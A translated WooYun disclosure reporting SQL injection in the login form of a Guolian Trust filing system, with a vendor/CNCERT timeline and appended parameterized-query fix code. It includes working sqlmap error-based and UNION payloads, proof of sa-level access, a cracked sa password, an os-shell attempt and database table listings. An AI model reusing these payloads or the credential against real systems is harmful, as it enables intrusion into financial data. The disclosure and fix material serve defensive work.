Vulnerability summary

Defect ID: wooyun-2015-0158785

Title: SQL injection on a site of 国联信托股份有限公司 (Guolian Trust Co., Ltd.)

Vendor: 国联信托股份有限公司

Author: 大饭刚

Submitted: 2015-12-08 01:06

Fixed: 2016-01-23 15:16

Published: 2016-01-23 15:16

Type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Handed over to a third-party partner organization (CNCERT, National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-12-08: Details sent to the vendor, awaiting vendor handling
2015-12-11: Vendor confirmed; details disclosed to the vendor only
2015-12-21: Details disclosed to core white hats and domain experts
2015-12-31: Details disclosed to regular white hats
2016-01-10: Details disclosed to intern white hats
2016-01-23: Details disclosed to the public

Brief description:

Guolian Trust, short for 国联信托股份有限公司 (Guolian Trust Co., Ltd.), traces back to Wuxi Investment Trust Company, founded in January 1987. In January 2003, Wuxi Trust Investment Company was approved for re-registration and renamed Guolian Trust Investment Co., Ltd.
In June 2007, with approval from China's banking regulator, it became one of the first batch of trust companies to receive the new financial licence. In July 2007 it was renamed Guolian Trust Co., Ltd. (有限责任公司). In July 2008 it was converted into a joint-stock company, 国联信托股份有限公司. Registered capital is currently RMB 1.23 billion, and the controlling shareholder is Wuxi Guolian Development (Group) Co., Ltd. At the end of 2011, total trust assets were RMB 22.418 billion.

Details:

Seems like a wealthy target.
Site:
http://**.**.**.**/ ===> resolves to IP: **.**.**.**
A port scan turned up a filing system:
http://**.**.**.**:8080/login.jsp
On inspection, the login form has a SQL injection vulnerability (sqlmap output below).

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: user_name (POST)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: serial=792487126859607321371232133245345346783&session=8BC17545730B39008AF73AE5DA317658&user_name=admin' AND 6094=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(120)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (6094=6094) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(106)+CHAR(112)+CHAR(113))) AND 'uznP'='uznP&password=admin

    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: serial=792487126859607321371232133245345346783&session=8BC17545730B39008AF73AE5DA317658&user_name=admin' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(113)+CHAR(120)+CHAR(118)+CHAR(113)+CHAR(102)+CHAR(101)+CHAR(69)+CHAR(105)+CHAR(119)+CHAR(102)+CHAR(68)+CHAR(109)+CHAR(72)+CHAR(100)+CHAR(113)+CHAR(122)+CHAR(106)+CHAR(112)+CHAR(113)-- &password=admin
---
back-end DBMS: Microsoft SQL Server 2008
current user is DBA: True


The application connects with sa privileges; all databases are listed below:

available databases [21]:
[*] EAST
[*] EFANS_GL
[*] EFCRM
[*] EFIFSHIS
[*] EFIFSREPORTDB
[*] EFMOB
[*] INTRUSTCREDITRPT
[*] INTRUSTELEMENTSRPT
[*] INTRUSTHistory
[*] INTRUSTREPORTDB
[*] INTRUSTRISKDB
[*] INTRUSTSTATRPT
[*] master
[*] model
[*] msdb
[*] NETCAPITAL
[*] REGULATORYREPORTDB
[*] smsdb
[*] tempdb
[*] XXXX
[*] ZJRPT


back-end DBMS: Microsoft SQL Server 2008
database management system users password hashes:


The sa password hash cracks to: q1w2e3r4t5~
os-shell errored out. The system has a large number of tables, but I did not pull any data.
That's all.

Proof of vulnerability:

Database: EFMOB
[9 tables]
+-----------------------------------------------------------+
| MOB_ATTACHMENTS_TLOGLIST |
| MOB_COPYRIGHT |
| MOB_DEVICES |
| MOB_PROBLEMREADED |
| MOB_TDICTPARAM |
| MOB_TLOGLIST |
| MOB_TOPERATOR |
| TBUSI_TDICTPARAM |
| TOPERATOR_UUID |
+-----------------------------------------------------------+
Database: INTRUSTHistory
[54 tables]
+-----------------------------------------------------------+
| BACKUP_HSUBDETAILYE |
| HASSACTDETAILSUBYE |
| HBENCUSTYE20130428bak |
| HBENCUSTYE20130428bak |
| HBENIFITOR_20110520 |
| HBENIFITOR_20110520 |
| HBENLIST20130428bak |
| HBENLIST20130428bak |
| HBONDERRORINFO |
| HBONDINFO113003 |
| HCASHFLOWS |
| HCOMMCREDIT |
| HCOMMTENANCY |
| HCONFIRMDFDETAIL |
| HCURRENCYRATE |
| HCUSTZJBD_20130329 |
| HCUSTZJBD_20130329 |
| HDATA1 |
| HDATA2 |
| HDEBTDETAIL |
| HDZDATA |
| HEMAILATTACH |
| HEMAILLIST |
| HEMAILRECIPIENTS |
| HFUNDACCT |
| HFUNDMANPRICEINFO |
| HHQINFO |
| HINVEST |
| HLIHIBOR |
| HLOGLIST |
| HLRB |
| HMYMONEYTOTAL |
| HNAVPRICEINFO_SUB |
| HNAVPRICEINFO_SUB |
| HPLSCHEDULE2 |
| HPLSCHEDULE2 |
| HPOSTBH |
| HPRODUCTENDINFO |
| HSQUAREDATA |
| HSTOCKAMOUNT1 |
| HSUBDETAILYE |
| HSUBJECTYE |
| HSUBYE |
| HTASKINFO |
| HTASKLIST |
| HZCFZB6901 |
| HZCFZB6901 |
| TAssActDetailYE_20130107 |
| TAssActDetailYE_20130107 |
| TFUNDACCT_BACKUP |
| TPROBLEMSTATETRANSFER_1 |
| TPROBLEMSTATE_1 |
| TPROJECTS_1 |
| TZLGHHTB |
+-----------------------------------------------------------+
Database: tempdb
[782 tables]
Database: EFANS_GL
[176 tables]
+-----------------------------------------------------------+
| ACCOUNT_BALANCE |
| ACCOUNT_INFO |
| ASSET_HISTORY |
| ASSET_INFO |
| ASSET_SUPPORT |
| ASSURE_CONTRACT |
| ASSURE_DETAIL |
| ASSURE_INFO |
| ATTACHMENT_INFO |
| BAIL_INFO |
| BILL_INFO |
| BI_DIMENSIONS |
| BI_OBEJCT |
| CHECK_INTEGRITY |
| CONFIG_CATALOG |
| CONFIG_CATEGORY |
| CONFIG_DATA |
| CONFIG_ELEMENT |
| CONFIG_IMPDIRECT |
| CONFIG_MENU |
| CONFIG_RECORD |
| CONFIG_REGION |
| CONFIG_TASK |
| CONFIG_WORKDAY |
| CONN_INFO |
| CONTRACT_ADDITION |
| CONTRACT_CREDIT |
| CONTRACT_DUEBILL |
| CONTRACT_HISTORY |
| CONTRACT_PUTOUT |
| CONTRACT_REPAYPLAN |
| COST_DEFINITION |
| CUSTOMER_IMPORTANT |
| CUST_CREDIT |
| EXCELIMP_CATALOG |
| EXCELIMP_FIELD |
| EXCEL_DATATEMP |
| FINANCE_REPORT |
| FLOW_CATALOG |
| FLOW_CONTENT |
| FLOW_DRIVEDRAW |
| FLOW_DRIVEDRAW |
| FLOW_NODEDRAW |
| FLOW_NODEDRAW |
| FLOW_OBJECT |
| FLOW_OPINION |
| FLOW_STATE |
| FLOW_TASK |
| FLOW_VIEW |
| FORMPRINT_CATALOG |
| FORMPRINT_DETAIL |
| FUND_RAISE |
| GRADE_INFO |
| INOUT_DETAIL |
| INTEREST_RATEINFO |
| INTERFACE_BUTTON |
| INTERFACE_CATALOG |
| INTERFACE_FIELD |
| INVOICE_INFO |
| ISSUE_SECHDULE |
| ITEM_APPROVE |
| ITEM_CHANGE |
| ITEM_CHECK |
| ITEM_CLASSIFY |
| ITEM_CONTRACT |
| ITEM_DULLPAY |
| ITEM_EXTEND |
| ITEM_FLOWPROCESS |
| ITEM_FUNCHISTORY |
| ITEM_FUNCTION |
| ITEM_INFO_TEST |
| ITEM_INFO_TEST |
| ITEM_PLANHISTORY |
| ITEM_PLANHISTORY |
| ITEM_PROJECT |
| ITEM_REPAY |
| ITEM_RISK |
| KNOWLEDGE_ANSWER |
| LEVEL_APPDATA |
| LEVEL_APPRECORD |
| LEVEL_DRIVE |
| LEVEL_ITEMINDEX |
| LEVEL_TYPE |
| MESSAGE_INFO |
| MODIFY_LOGINFO |
| MYORG_INFO |
| OBJECT_RELATION |
| OBJECT_SCHEDULE |
| PIC_INFO |
| PLAN_INFO |
| PLAN_WEEK |
| POOL_ASSETCHANGE |
| POOL_ASSETCHANGE |
| POOL_ASSETTREAT |
| POOL_HISTORY |
| POOL_INFO |
| POOL_PREPAY |
| POOL_RATECHANGE |
| POOL_REPAYPLAN |
| POOL_STANDARD |
| POST_ACCBALANCE |
| POST_ACCOUNT |
| POST_BALANCE |
| POST_HISTORY |
| POST_LIST |
| POST_SUBBALANCE |
| POST_SUBJECT |
| POST_TRADEDETAIL |
| POST_TRADEDETAIL |
| POST_TYPE |
| POST_WARRANT |
| PRE_ITEM |
| PRODUCT_ACCOUNT |
| PRODUCT_AGNCY |
| PRODUCT_BOOK |
| PRODUCT_CASH_IMPORT |
| PRODUCT_CASH_IMPORT |
| PRODUCT_DATETIME |
| PRODUCT_EVENT |
| PRODUCT_GROUP |
| PRODUCT_HISTORY_IMPORT |
| PRODUCT_HISTORY_IMPORT |
| PRODUCT_HOLDER |
| PRODUCT_INFO |
| PRODUCT_INOUT |
| PRODUCT_ISSUE |
| PRODUCT_LEVEL |
| PRODUCT_MUL |
| PRODUCT_PAYMENT |
| PRODUCT_RECEIVEPAY |
| PRODUCT_REPAY |
| PRODUCT_SETUP |
| PRODUCT_TRADE |
| PRODUCT_TRUST |
| PRODUCT_TYPE |
| PROJECT_INFO |
| RATE_SETTLEMENT |
| REQUIRE_INFO |
| SCHEDULE_CATALOG |
| SCHEDULE_NODE |
| TAATSUBJECT |
| TACCTBOOK |
| TAsstActPostList |
| TBASETAXRATE |
| TBENIFITOR |
| TCASHTYPE |
| TCUSTFINANCEINFO |
| TCUSTFINANCEITEM |
| TCUSTHOLDERS |
| TCUST_CERT |
| TDEPARTMENT |
| TDICTPARAM |
| TEFGMSCONTROL |
| TENTCUSTINFO |
| TENTCWZBINFO |
| TERRORINFO |
| TLOGLIST |
| TOPBOOK |
| TOPERATOR |
| TOPROLE |
| TRADE_INFO |
| TRECORDATTACHMENTS |
| TREPORTINFO |
| TROLE |
| TSYSCONTROL |
| TSYSTEMINFO |
| TUSERINFO |
| TUSETIMES |
| T_REPORT_DATA_T |
| T_REPORT_DATA_T |
| T_REPORT_FIELD |
| VIEW_SHOW_CHECK_INFO |
| WORKINFO_CONFIG |
| WORK_LOG |
| sysdiagrams |
| temp |
+-----------------------------------------------------------+
Database: XXXX
[10 tables]
+-----------------------------------------------------------+
| billexps |
| binvcapitals |
| borrowers |
| colregs |
| loanbills |
| loancontracts |
| loanmoneys |
| loanreturns

Fix recommendation:

Filter the parameters properly.

Copyright notice: when reposting, credit the source: 大饭刚@乌云
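The standard fix for this bug class is to bind the login input as a query parameter rather than splice it into the SQL text, which is what "filter the parameters" amounts to in practice. The block below is an added example, not code from the report or from the affected application: it contrasts a login query built by string concatenation with a parameterized one, and adds a unit-test-level check for the symptom sqlmap's error-based test looks for (a quote in the input reaching the SQL parser). It uses in-memory SQLite as a stand-in for the site's SQL Server 2008; the table and column names (TOPERATOR, user_name, password, role) and the sample rows are assumptions.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the application's operator table.

    The real site runs Microsoft SQL Server 2008; the table and column names
    (TOPERATOR, user_name, password, role) and these rows are assumptions,
    not taken from the application. Passwords are stored in plaintext only
    to keep the demonstration short."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE TOPERATOR (user_name TEXT, password TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO TOPERATOR VALUES (?, ?, ?)",
        [("admin", "correct-horse", "sa"), ("clerk", "battery", "user")],
    )
    return conn


def login_vulnerable(conn, user_name, password):
    """The bug class: user input is spliced into the SQL text, so a quote in
    user_name changes the statement's structure instead of staying data."""
    sql = (
        "SELECT role FROM TOPERATOR WHERE user_name = '" + user_name
        + "' AND password = '" + password + "'"
    )
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_hardened(conn, user_name, password):
    """The fix: bound parameters are sent as values and never parsed as SQL."""
    sql = "SELECT role FROM TOPERATOR WHERE user_name = ? AND password = ?"
    row = conn.execute(sql, (user_name, password)).fetchone()
    return row[0] if row else None


def quote_reaches_parser(conn, login_fn):
    """Unit-test-level check for the property sqlmap's error-based test
    detects: does a single quote in the username surface as a database
    error? True means the input is being parsed as SQL, not treated as data."""
    try:
        login_fn(conn, "o'neil", "x")  # constructed probe value
    except sqlite3.OperationalError:
        return True
    return False
```

On the real system the same change means a JDBC PreparedStatement in the JSP login code and, separately, a database account with far less than sa privileges, so that an injection that does slip through cannot read every database on the server.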


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 10

Confirmed: 2015-12-11 16:54

Vendor reply:

CNVD confirmed and reproduced the described situation. CNVD has notified the site operator by email through its publicly listed contact channel, and the operator will provide a solution in follow-up.

Latest status:

None yet